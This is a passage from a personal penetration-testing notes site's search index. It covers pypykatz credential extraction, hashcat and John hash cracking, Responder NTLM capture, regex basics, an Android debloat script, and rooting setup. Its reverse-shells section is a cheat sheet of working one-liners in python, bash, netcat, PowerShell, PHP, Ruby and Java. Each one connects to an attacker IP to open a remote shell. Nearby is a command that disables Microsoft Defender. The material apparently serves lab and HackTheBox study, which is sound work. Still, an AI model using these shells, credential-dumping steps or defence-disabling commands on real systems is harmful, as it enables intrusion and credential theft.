                        ","tags":["windows","dump hashes","passwords"]},{"location":"pypykatz/#basic-usage","title":"Basic usage","text":"
                        pypykatz lsa minidump /home/path/lsass.dmp \n

                        From the results, as an example, we will get this snippet:

                        sid S-1-5-21-4019466498-1700476312-3544718034-1001\nluid 1354633\n    == MSV ==\n        Username: bob\n        Domain: DESKTOP-33E7O54\n        LM: NA\n        NT: 64f12cddaa88057e06a81b54e73b949b\n        SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8\n        DPAPI: NA\n

                        MSV is an authentication package in Windows that LSA calls on to validate logon attempts against the SAM database. Pypykatz extracted the SID, Username, Domain, and even the NT & SHA1 password hashes associated with the bob user account's logon session stored in LSASS process memory.
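                        The extracted NT hash can then be attacked offline; a minimal sketch with hashcat (the wordlist path is an assumption):

                        # -m 1000 = NTLM\nhashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt\n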

                        But also, these others:

                        • WDIGEST is an older authentication protocol enabled by default in Windows XP - Windows 8 and Windows Server 2003 - Windows Server 2012. LSASS caches credentials used by WDIGEST in clear-text.
                        • Kerberos is a network authentication protocol used by Active Directory in Windows Domain environments. Domain user accounts are granted tickets upon authentication with Active Directory. LSASS caches passwords, ekeys, tickets, and pins associated with Kerberos. It is possible to extract these from LSASS process memory and use them to access other systems joined to the same domain.
                        • DPAPI: The Data Protection Application Programming Interface or DPAPI is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Here are just a few examples of applications that use DPAPI and what they use it for:
                        | Application | Use of DPAPI |
                        | --- | --- |
                        | Internet Explorer | Password form auto-completion data (username and password for saved sites). |
                        | Google Chrome | Password form auto-completion data (username and password for saved sites). |
                        | Outlook | Passwords for email accounts. |
                        | Remote Desktop Connection | Saved credentials for connections to remote machines. |
                        | Credential Manager | Saved credentials for accessing shared resources, joining wireless networks, VPNs and more. |

                        Mimikatz and Pypykatz can extract the DPAPI masterkey for the logged-on user whose data is present in LSASS process memory. This masterkey can then be used to decrypt the secrets associated with each of the applications using DPAPI and result in the capturing of credentials for various accounts.

                        ","tags":["windows","dump hashes","passwords"]},{"location":"rdesktop/","title":"rdesktop","text":"

                        rdesktop is an open source UNIX client for connecting to Windows Remote Desktop Services, capable of natively speaking Remote Desktop Protocol (RDP) in order to present the user's Windows desktop.

                        ","tags":["tools","windows","rdp"]},{"location":"rdesktop/#installation","title":"Installation","text":"

                        Preinstalled in Kali. Otherwise:

                        sudo apt-get install rdesktop\n
                        ","tags":["tools","windows","rdp"]},{"location":"rdesktop/#basic-usage","title":"Basic usage","text":"
                        rdesktop $ip\n\n# Mounting a Linux Folder Using rdesktop\nrdesktop $ip -d <domain> -u <username> -p <'Password0@'> -r disk:linux='/home/user/rdesktop/files'\n
                        ","tags":["tools","windows","rdp"]},{"location":"regex/","title":"Mastering Regular Expressions - Regex","text":"

                        The implementation system of regex functionality is often called \"regular expression engine\". Basically a regex engine tries to match the pattern to the given string. There are two main types of regex engines: DFA and NFA, also referred to as text-directed and regex-directed engines.

                        With metacharacters you can build complex patterns that can match a wide range of combinations.

                        | Metacharacter | Description |
                        | --- | --- |
                        | `.` | Any single character |
                        | `^` | Match the beginning of a line |
                        | `$` | Match the end of a line |
                        | `a\|b` | Match either a or b |
                        | `\d` | Any digit |
                        | `\D` | Any non-digit character |
                        | `\w` | Any word character |
                        | `\W` | Any non-word character |
                        | `\s` | Any whitespace character |
                        | `\S` | Any non-whitespace character |
                        | `\b` | Matches a word boundary |
                        | `\B` | Match must not occur on a `\b` boundary |
                        | `[\b]` | Backspace character |
                        | `\xYY` | Match hex character YY |
                        | `\ddd` | Octal character ddd |
                        | `[]` | Start/close a character class |
                        | `()` | Start/close a character group |
                        | `\` | Escape special characters |
                        | `\|` | It means OR |
                        | `{}` | Start/close repetitions of a character class |

                        Quantifiers

                        | Quantifier | Description |
                        | --- | --- |
                        | `+` | The preceding character must occur one or more times. |
                        | `?` | The preceding character is optional: it can occur zero or one time. |
                        | `*` | Matches zero or more of the preceding character. |
                        | `{n}` | Matches exactly n occurrences of the preceding character. |
                        | `{n,}` | Matches n or more occurrences of the preceding character. |
                        | `{n,m}` | Matches between n and m occurrences of the preceding element. |

                        The following are common examples of character classes:

                        • [abc] - matches any one character that is either 'a', 'b', or 'c'.
                        • [a-z] - matches any one lowercase letter from 'a' to 'z'.
                        • [A-Z] - matches any one upper case letter from 'A' to 'Z'.
                        • [0-9] - matches any one digit from '0' to '9'. Optionally, use the \d metacharacter.
                        • [^abc] - matches any one character that is not 'a', 'b', or 'c'.
                        • [\\w] - matches any one-word character, including letters, digits, and underscore.
                        • [\\s] - matches any whitespace character, including space, tab, and newline.
                        • [^a-z] - matches any one character that is not a lowercase letter from 'a' to 'z'.

                        In regex, any subpattern enclosed within the parentheses () is considered a group. For example, (xyz) creates a group that matches the exact sequence \"xyz\".
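                        A quick way to test these patterns is grep -E; a minimal sketch (the sample strings are invented):

                        # Character class + quantifier: extracts \"123\"\necho \"abc 123 45\" | grep -oE '[0-9]{3}'\n\n# Group + alternation: extracts \"fake\" and \"make\" but not \"jake\"\necho \"fake make jake\" | grep -oE '(f|m)ake'\n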

                        | Non-printing character | Description |
                        | --- | --- |
                        | `\0` | NULL byte. In many programming languages it marks the end of a string |
                        | `\b` | Within a character class, the backspace character; outside, `\b` matches a word boundary |
                        | `\t` | Tab |
                        | `\n` | New line |
                        | `\v` | Vertical tabulation |
                        | `\f` | Form feed |
                        | `\r` | Carriage return. In HTTP the `\r\n` sequence is used as the end-of-line marker |
                        | `\e` | Escape character |
                        "},{"location":"regex/#unicode","title":"Unicode","text":"

                        Regular expression flavors that work with Unicode use specific meta-sequences to match code points:

                        # `\u` + code-point, where code-point is the hexadecimal number of the character to match\n`\u2603`\n\n# `\x`{code-point} in the PCRE library in Apache and PHP\n`\x{2603}`\n
                        "},{"location":"regshot/","title":"regshot","text":"

                        regshot helps you identify changes in the Registry made by a thick-client application. It's used to compare the registry entries that changed during an installation or a change in your system settings.

                        "},{"location":"regshot/#installation","title":"Installation","text":"

                        Download from: https://sourceforge.net/projects/regshot/

                        "},{"location":"regshot/#usage","title":"Usage","text":"

                        From the course Pentesting thick clients applications.

                        1. Run the regshot version that matches your thick app (x86 or x64).

                        2. Click on \"First shot\". It will make a \"shot\" of the existing registry entries.

                        3. Open the app you want to test and log into it.

                        4. Perform some kind of action, like for instance, viewing the profile.

                        5. Take a \"Second shot\" of the Registry entries.

                        6. After that, you will see the button \"Compare\" enabled. Click on it.

                        An HTML file will be generated and you will see the registry entries:

                        An interesting registry entry is \"isLoggedIn\", which has changed from false to true. This may be a potential attack vector (we could set it to true and also change the username to admin).

                        HKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"false\"  \nHKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"true\"\n

                        "},{"location":"remove-bloatware/","title":"Remove bloatware from android phones","text":"

                        Android Debug Bridge - adb cheat sheet.

                        First of all, make sure you have enabled Developer mode in your mobile. Afterward, enable \"USB Debug mode\" (\"Depuraci\u00f3n USB\" in Spanish).

                        1. Connect mobile to computer with USB cable.

                        2. Press \"File Transfer\" in mobile.

                        3. In laptop, open a terminal and run:

                        # Check if device is connected. \nadb devices\n

                        4. If device is well connected, mobile will be prompted to accept the computer connection.

                        5. Access the device from terminal:

                        adb shell\n

                        Now you can uninstall packages.
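                        Before uninstalling, it helps to list what is installed and filter for a vendor; a minimal sketch from inside the adb shell:

                        # List all installed packages (-3 would restrict to third-party apps)\npm list packages\n\n# Filter for a vendor, e.g. Xiaomi packages\npm list packages | grep -i xiaomi\n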

                        "},{"location":"remove-bloatware/#basic-commands","title":"Basic commands","text":"
                        # Uninstall app\npm uninstall --user 0 app.package.name\n\n# Deactivate app\npm disable-user app.package.name\n
                        "},{"location":"remove-bloatware/#list-of-xiaomi-trash","title":"List of xiaomi trash","text":"
                        • com.miui.analytics: Xiaomi analytics service.
                        • com.xiaomi.mipicks: app store. Occasionally it displays ads.
                        • com.miui.msa.global: MIUI ads and advertising service.
                        • com.miui.cloudservice | com.miui.cloudservice.sysbase | com.miui.newmidrive: Mi Cloud tools.
                        • com.miui.cloudbackup: Mi Cloud Backup cloud backup tool.
                        • com.miui.backup: MIUI backup tool.
                        • com.xiaomi.glgm: Xiaomi games tool.
                        • com.xiaomi.payment | com.mipay.wallet.in: Xiaomi mobile payment tools.
                        • com.tencent.soter.soterserver: mobile payments feature for WeChat and other services popular in China.
                        • cn.wps.xiaomi.abroad.lite: Mi DocViewer, PDF document viewing tool.
                        • com.miui.videoplayer: Mi Video player.
                        • com.miui.player: Mi Music player.
                        • com.mi.globalbrowser: Mi Browser.
                        • com.mi.midrop: ShareMe tool for sharing files with other Xiaomi devices.
                        • com.miui.yellowpage: Mi YellowPages, phone anti-spam protection system.
                        • com.miui.android.fashiongallery: wallpaper carousel.
                        • com.miui.bugreport | com.miui.miservice: MIUI bug reporting tools.
                        • com.miui.weather2: Xiaomi weather app.
                        • com.xiaomi.joyose: analytics and advertising tools.
                        • com.zhiliaoapp.musically: TikTok
                        • com.facebook.katana: Facebook app.
                        • com.facebook.services: Facebook services.
                        • com.facebook.system: Facebook app installer.
                        • com.facebook.appmanager: Facebook app manager.
                        • com.ebay.mobile | com.ebay.carrier: eBay app
                        • com.alibaba.aliexpresshd: AliExpress app.

                        More suggestions to remove bloatware in this repo: xiaomi_debloat.sh

                        pm uninstall --user 0 com.android.inputmethod.latin\npm uninstall --user 0 com.android.camera2\npm uninstall --user 0 com.android.providers.partnerbookmarks\npm uninstall --user 0 com.android.emergency\npm uninstall --user 0 com.android.printspooler\npm uninstall --user 0 com.android.apps.tag\npm uninstall --user 0 com.android.dreams.basic\npm uninstall --user 0 com.android.dreams.phototable\npm uninstall --user 0 com.android.magicsmoke\npm uninstall --user 0 com.android.managedprovisioning\npm uninstall --user 0 com.android.noisefield\npm uninstall --user 0 com.android.phasebeam\npm uninstall --user 0 com.android.wallpaper.holospiral\npm uninstall --user 0 com.android.stk\npm uninstall --user 0 com.android.bluetoothmidiservice\npm uninstall --user 0 com.android.browser\npm uninstall --user 0 com.android.cellbroadcastreciever\npm uninstall --user 0 com.android.hotwordenrollment.okgoogle\npm uninstall --user 0 com.android.printservice.recommendation\npm uninstall --user 0 com.android.quicksearchbox\npm uninstall --user 0 com.android.email\npm uninstall --user 0 com.android.bips\npm uninstall --user 0 com.android.hotwordenrollment.xgoogle\npm uninstall --user 0 com.android.chrome\npm uninstall --user 0 com.android.webview\npm uninstall --user 0 com.android.calendar\npm uninstall --user 0 com.android.providers.calendar\npm uninstall --user 0 android.romstats\npm uninstall --user 0 com.android.documentsui\npm uninstall --user 0 com.android.globalFileexplorer\npm uninstall --user 0 com.android.midrive\npm uninstall --user 0 com.android.calculator2\npm uninstall --user 0 com.android.soundrecorder\npm uninstall --user 0 com.android.musicfx\npm uninstall --user 0 com.android.bookmarkprovider\npm uninstall --user 0 com.android.gallery3d\npm uninstall --user 0 com.android.calllogbackup\npm uninstall --user 0 com.android.traceur\npm uninstall --user 0 com.sec.android.AutoPreconfig\npm uninstall --user 0 com.sec.android.service.health\n\n\n# Google apps:\npm uninstall --user 0 com.google.android.tts\npm uninstall --user 0 com.google.android.apps.googleassistant\npm uninstall --user 0 com.google.android.apps.setupwizard.searchselector\npm uninstall --user 0 com.google.android.pixel.setupwizard\npm uninstall --user 0 com.google.android.gm\npm uninstall --user 0 com.google.android.calendar\npm uninstall --user 0 com.google.android.calculator\npm uninstall --user 0 com.google.android.apps.recorder\npm uninstall --user 0 com.google.android.printservice.recommendation\npm uninstall --user 0 com.google.android.apps.books\npm uninstall --user 0 com.google.android.apps.cloudprint\npm uninstall --user 0 com.google.android.apps.currents\npm uninstall --user 0 com.google.android.apps.fitness\npm uninstall --user 0 com.google.android.apps.photos\npm uninstall --user 0 com.google.android.apps.plus\npm uninstall --user 0 com.google.android.apps.tachyon\npm uninstall --user 0 com.google.android.music\npm uninstall --user 0 com.google.android.apps.wellbeing\npm uninstall --user 0 com.google.android.email\npm uninstall --user 0 com.google.android.googlequicksearchbox\npm uninstall --user 0 com.google.android.talk\npm uninstall --user 0 com.google.android.syncadapters.contacts\npm uninstall --user 0 com.google.android.videos\npm uninstall --user 0 com.google.tango.measure\npm uninstall --user 0 com.google.android.youtube\npm uninstall --user 0 com.google.android.apps.docs\npm uninstall --user 0 com.google.ar.lens\npm uninstall --user 0 com.google.android.apps.restore\npm uninstall --user 0 
com.google.android.soundpicker\npm uninstall --user 0 com.google.android.syncadapters.calendar\npm uninstall --user 0 com.google.ar.core\npm uninstall --user 0 com.google.android.setupwizard\npm uninstall --user 0 com.google.android.apps.wallpaper\npm uninstall --user 0 com.google.android.projection.gearhead\npm uninstall --user 0 com.google.android.marvin.talkback\npm uninstall --user 0 com.google.android.inputmethod.latin\n\n\n#Xiaomi/MIUI/Baidu stuff:\n\npm uninstall --user 0 com.mi.health\npm uninstall --user 0 com.miui.zman\npm uninstall --user 0 com.miui.freeform\npm uninstall --user 0 com.miui.miwallpaper.earth\npm uninstall --user 0 com.miui.miwallpaper.mars\npm uninstall --user 0 com.miui.newmidrive\npm uninstall --user 0 cn.wps.xiaomi.abroad.lite\npm uninstall --user 0 com.miui.miservice\npm uninstall --user 0 com.xiaomi.mi_connect_service\npm uninstall --user 0 com.xiaomi.miplay_client\npm uninstall --user 0 com.miui.mishare.connectivity\npm uninstall --user 0 com.miui.huanji\npm uninstall --user 0 com.miui.misound\npm uninstall --user 0 com.xiaomi.mirecycle\npm uninstall --user 0 com.miui.cloudbackup\npm uninstall --user 0 com.miui.backup\npm uninstall --user 0 com.mfashiongallery.emag\npm uninstall --user 0 com.miui.accessibility\npm uninstall --user 0 com.xiaomi.account\npm uninstall --user 0 com.xiaomi.xmsf\npm uninstall --user 0 com.xiaomi.simactivate.service\npm uninstall --user 0 com.miui.daemon\npm uninstall --user 0 com.miui.cloudservice.sysbase\npm uninstall --user 0 com.mi.webkit.core\npm uninstall --user 0 com.sohu.inputmethod.sogou.xiaomi\npm uninstall --user 0 com.miui.notes\npm uninstall --user 0 com.bsp.catchlog\npm uninstall --user 0 com.miui.vsimcore\npm uninstall --user 0 com.xiaomi.scanner\npm uninstall --user 0 com.miui.greenguard\npm uninstall --user 0 com.miui.android.fashiongallery\npm uninstall --user 0 com.miui.cloudservice\npm uninstall --user 0 com.miui.micloudsync\npm uninstall --user 0 com.miui.enbbs\npm uninstall --user 0 com.mi.android.globalpersonalassistant\npm uninstall --user 0 com.mi.globalTrendNews\npm uninstall --user 0 com.milink.service\npm uninstall --user 0 com.mipay.wallet.id\npm uninstall --user 0 com.mipay.wallet.in\npm uninstall --user 0 com.miui.analytics\npm uninstall --user 0 com.miui.bugreport\npm uninstall --user 0 com.miui.cleanmaster\npm uninstall --user 0 com.miui.hybrid.accessory\npm uninstall --user 0 com.miui.miwallpaper\npm uninstall --user 0 com.miui.msa.global\npm uninstall --user 0 com.miui.touchassistant\npm uninstall --user 0 com.miui.translation.kingsoft\npm uninstall --user 0 com.miui.translation.xmcloud\npm uninstall --user 0 com.miui.translation.youdao\npm uninstall --user 0 com.miui.translationservice\npm uninstall --user 0 com.miui.userguide\npm uninstall --user 0 com.miui.virtualsim\npm uninstall --user 0 com.miui.yellowpage\npm uninstall --user 0 com.miui.videoplayer\npm uninstall --user 0 com.miui.weather2\npm uninstall --user 0 com.miui.player\npm uninstall --user 0 com.miui.screenrecorder\npm uninstall --user 0 com.miui.providers.weather\npm uninstall --user 0 com.miui.compass\npm uninstall --user 0 com.miui.calculator\npm uninstall --user 0 com.xiaomi.vipaccount\npm uninstall --user 0 com.xiaomi.channel\npm uninstall --user 0 com.mipay.wallet\npm uninstall --user 0 com.xiaomi.pass\npm uninstall --user 0 com.xiaomi.shop\npm uninstall --user 0 com.xiaomi.joyose\npm uninstall --user 0 com.xiaomi.providers.appindex\npm uninstall --user 0 com.miui.fm\npm uninstall --user 0 com.mi.liveassistant\npm uninstall 
--user 0 com.xiaomi.gamecenter.sdk.service\npm uninstall --user 0 com.xiaomi.payment\npm uninstall --user 0 com.baidu.input_mi\npm uninstall --user 0 com.xiaomi.ab\npm uninstall --user 0 com.xiaomi.jr\npm uninstall --user 0 com.baidu.duersdk.opensdk\npm uninstall --user 0 com.miui.hybrid\npm uninstall --user 0 com.baidu.searchbox\npm uninstall --user 0 com.xiaomi.glgm\npm uninstall --user 0 com.xiaomi.midrop\npm uninstall --user 0 com.xiaomi.mipicks\npm uninstall --user 0 com.miui.personalassistant\npm uninstall --user 0 com.miui.audioeffect\npm uninstall --user 0 com.miui.cit\npm uninstall --user 0 com.miui.qr\npm uninstall --user 0 com.miui.nextpay\npm uninstall --user 0 com.xiaomi.o2o\n\n\n#Xiaomi.eu:\npm uninstall --user 0 pl.zdunex25.updater\n\n\n#RevolutionOS: (not well tested)\npm uninstall --user 0 ros.ota.updater\n\n#SyberiaOS: (not well tested)\npm uninstall --user 0 com.syberia.ota\npm uninstall --user 0 com.syberia.SyberiaPapers\n\n\n#LineageOS: (not well tested)\npm uninstall --user 0 org.lineageos.recorder\npm uninstall --user 0 org.lineageos.snap\n\n\n#Paranoid Android:\npm uninstall --user 0 com.hampusolsson.abstruct\npm uninstall --user 0 code.name.monkey.retromusic\n\n#Other stuff:\npm uninstall --user 0 com.autonavi.minimap\npm uninstall --user 0 com.caf.fmradio\npm uninstall --user 0 com.opera.preinstall\npm uninstall --user 0 com.qualcomm.qti.perfdump\npm uninstall --user 0 com.duokan.phone.remotecontroller\npm uninstall --user 0 com.samsung.aasaservice\npm uninstall --user 0 org.simalliance.openmobileapi.service\npm uninstall --user 0 com.duokan.phone.remotecontroller.peel.plugin\npm uninstall --user 0 com.facemoji.lite.xiaomi\npm uninstall --user 0 com.facebook.appmanager\npm uninstall --user 0 com.facebook.katana\npm uninstall --user 0 com.facebook.services\npm uninstall --user 0 com.facebook.system\npm uninstall --user 0 com.netflix.partner.activation\n\n\n# !EXPERIMENTAL STUFF!\n\n\n#GPS & Location debloat\n#Uninstalling these may break apps like Waze.\n#You have been warned.\npm uninstall --user 0 com.android.location.fused\npm uninstall --user 0 org.codeaurora.gps.gpslogsave\npm uninstall --user 0 com.google.android.gms.location.history\npm uninstall --user 0 com.qualcomm.location\npm uninstall --user 0 com.xiaomi.bsp.gps.nps\npm uninstall --user 0 com.xiaomi.location.fused\n\n\n#Use this if you don't like the stock MIUI launcher.\n#Uninstalling this without basic setup and an alternative launcher will make the device unstable or softbricked.\n#You can't downgrade to a lower version of MIUI launcher after uninstalling this.\n#You have been warned.\npm uninstall --user 0 com.miui.home\n\n\n#Always-on Display removal\n#Not recommended, and not well-tested in daily usage\n#You have been warned.\npm uninstall --user 0 com.miui.aod\n
                        "},{"location":"responder/","title":"Responder.py - A SMB server to listen to NTLM hashes","text":"

Responder is an LLMNR, NBT-NS and mDNS poisoner, with a built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Responder can perform many different kinds of attacks. For instance, we may set up a malicious SMB server. When the target machine attempts NTLM authentication to that server, Responder sends back a challenge for the client to encrypt with the user's password. When the client responds, Responder uses the challenge and the encrypted response to generate the NetNTLMv2 hash. While we can't reverse a NetNTLMv2 hash, we can try many common passwords to see if any produce the same challenge-response; if one does, we know it is the password. We can use John The Ripper for this.
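For example, a minimal cracking sketch with John The Ripper (the hash file name and wordlist path are assumptions):

# hash.txt holds a NetNTLMv2 challenge-response captured by Responder (hypothetical file name)\njohn --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt\n# print cracked passwords\njohn --show hash.txt\n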

                        ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#installation","title":"Installation","text":"
                        git clone https://github.com/lgandx/Responder.git\ncd Responder \nsudo pip install -r requirements.txt\n
                        ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#basic-usage","title":"Basic usage","text":"
                        ./Responder.py -I [interface] -w -d\n# -I: Set interface \n# -w: Start the WPAD rogue proxy server. Default value is False\n# -d: Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False\n\n# In the HTB machine responder:\n./Responder.py -I tun0 -w -d\n

All saved hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy a hash to a file and attempt to crack it using hashcat module 5600.
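A hedged hashcat equivalent (hash file and wordlist paths are assumptions):

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\n# -m 5600: NetNTLMv2 hash mode\n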

Note: If you notice multiple hashes for one account, this is because NTLMv2 uses both a client-side and a server-side challenge, randomized for each interaction. The resulting hashes are effectively salted with a randomized string, which is why they don't match even though they represent the same password.

                        ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#practical-example","title":"Practical example","text":"

                        HackTheBox machine: Responder.

                        ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"reverse-shells/","title":"Reverse shells","text":"Resources to generate reverse shells
                        • https://www.revshells.com/
                        • Netcat for windows 32/64 bit
                        • Pentesmonkey
                        • PayloadsAllTheThings
All about shells

| Shell Type | Description |
| --- | --- |
| Reverse shell | Initiates a connection back to a \"listener\" on our attack box. |
| Bind shell | \"Binds\" to a specific port on the target host and waits for a connection from our attack box. |
| Web shell | Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command). |

Victim's machine: initiates a connection back to a \"listener\" on our attacking machine.

                        For this attack to work, first we set the listener in the attacking machine using netcat.

                        nc -lnvp 1234\n

                        After that, on the victim's machine, you can launch the reverse shell connection.

                        A Reverse Shell is handy when we want to get a quick, reliable connection to our compromised host. However, a Reverse Shell can be very fragile. Once the reverse shell command is stopped, or if we lose our connection for any reason, we would have to use the initial exploit to execute the reverse shell command again to regain our access.

                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#reverse-shell-connections","title":"Reverse shell connections","text":"","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#python","title":"python","text":"
                        python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#bash","title":"bash","text":"
                        bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'\n
                        rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f\n\n# rm /tmp/f;\n# Removes the /tmp/f file if it exists, -f causes rm to ignore nonexistent files. The semi-colon (;) is used to execute the command sequentially.\n\n# mkfifo /tmp/f;\n# Makes a FIFO named pipe file at the location specified. In this case, /tmp/f is the FIFO named pipe file, the semi-colon (;) is used to execute the command sequentially.\n\n# cat /tmp/f |\n# Concatenates the FIFO named pipe file /tmp/f, the pipe (|) connects the standard output of cat /tmp/f to the standard input of the command that comes after the pipe (|).\n\n# /bin/sh -i 2>&1 |\n# Specifies the command language interpreter using the -i option to ensure the shell is interactive. 2>&1 ensures the standard error data stream (2) & standard output data stream (1) are redirected to the command following the pipe (|).\n\n# nc $ip <port> >/tmp/f\n# Uses Netcat to send a connection to our attack host $ip listening on port <port>. The output will be redirected (>) to /tmp/f, serving the Bash shell to our waiting Netcat listener when the reverse shell one-liner command is executed\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#powershell","title":"powershell","text":"
                        powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n\n# same, but without assigning $client to the new object\npowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"10.10.10.10\",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n\n# powershell -nop -c \n# Executes powershell.exe with no profile (nop) and executes the command/script block (-c or -Command) contained in the quotes\n\n# \"$client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,433);\n# Sets/evaluates the variable $client equal to (=) the New-Object cmdlet, which creates an instance of the System.Net.Sockets.TCPClient .NET framework object. The .NET framework object will connect with the TCP socket listed in the parentheses (10.10.14.158,443). The semi-colon (;) ensures the commands & code are executed sequentially.\n\n# $stream = $client.GetStream();\n# Sets/evaluates the variable $stream equal to (=) the $client variable and the .NET framework method called GetStream that facilitates network communications. \n\n# [byte[]]$bytes = 0..65535|%{0}; \n# Creates a byte type array ([]) called $bytes that returns 65,535 zeros as the values in the array. This is essentially an empty byte stream that will be directed to the TCP listener on an attack box awaiting a connection.\n\n# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\n\n# Starts a while loop containing the $i variable set equal to (=) the .NET framework Stream.Read ($stream.Read) method. The parameters: buffer ($bytes), offset (0), and count ($bytes.Length) are defined inside the parentheses of the method.\n\n\n# {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);\n# Sets/evaluates the variable $data equal to (=) an ASCII encoding .NET framework class that will be used in conjunction with the GetString method to encode the byte stream ($bytes) into ASCII. In short, what we type won't just be transmitted and received as empty bits but will be encoded as ASCII text. \n\n# $sendback = (iex $data 2>&1 | Out-String ); \n# Sets/evaluates the variable $sendback equal to (=) the Invoke-Expression (iex) cmdlet against the $data variable, then redirects the standard error (2>) & standard input (1) through a pipe (|) to the Out-String cmdlet which converts input objects into strings. Because Invoke-Expression is used, everything stored in $data will be run on the local computer. \n\n# $sendback2 = $sendback + 'PS ' + (pwd).path + '> '; \n# Sets/evaluates the variable $sendback2 equal to (=) the $sendback variable plus (+) the string PS ('PS') plus + path to the working directory ((pwd).path) plus (+) the string '> '. 
This will result in the shell prompt being PS C:\\workingdirectoryofmachine >. \n\n# $sendbyte=  ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}\n# Sets/evaluates the variable $sendbyte equal to (=) the ASCII encoded byte stream that will use a TCP client to initiate a PowerShell session with a Netcat listener running on the attack box.\n
# Disable Microsoft Defender real-time monitoring (requires an elevated PowerShell)\nSet-MpPreference -DisableRealtimeMonitoring $true\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#php","title":"php","text":"
                        php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#netcat","title":"netcat","text":"
                        nc -e /bin/sh 10.0.0.1 1234\n\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#ruby","title":"ruby","text":"
                        ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#java","title":"java","text":"
                        r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#xterm","title":"xterm","text":"
                        xterm -display 10.0.0.1:1\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"rooting-mobile/","title":"Rooting mobile","text":""},{"location":"rooting-mobile/#samsung-galaxy-a515f","title":"Samsung Galaxy A515F","text":""},{"location":"rooting-mobile/#install-a-windows-10-vm-in-your-phisical-kali-machine","title":"Install a Windows 10 VM in your phisical kali machine","text":"
1. Install a Windows 10 VM in your preferred hypervisor technology.

2. Pass your USB device through to the Windows machine: VirtualBox > Settings (on the desired VM) > USB > make sure USB 3.0 is selected > click on the + icon and select the device.

Troubleshooting: You may find that your Android phone does not appear there yet. The reason might be that the user running the VirtualBox process has no permission to access the mounted USB devices. We can grant it on our physical machine (Kali):

                        sudo usermod -a -G vboxusers $username\nnewgrp vboxusers\n\n# and reboot kali\n

After that, repeat step 2 and the device should appear.

                        "},{"location":"rooting-mobile/#install-samsung-drivers-in-your-windows-vm","title":"Install Samsung drivers in your Windows VM","text":"

                        There is this video with assistance for this: https://www.youtube.com/watch?v=K3Jk7dCvdNM.

                        This is the download link for getting those drivers: https://developer.samsung.com/android-usb-driver.

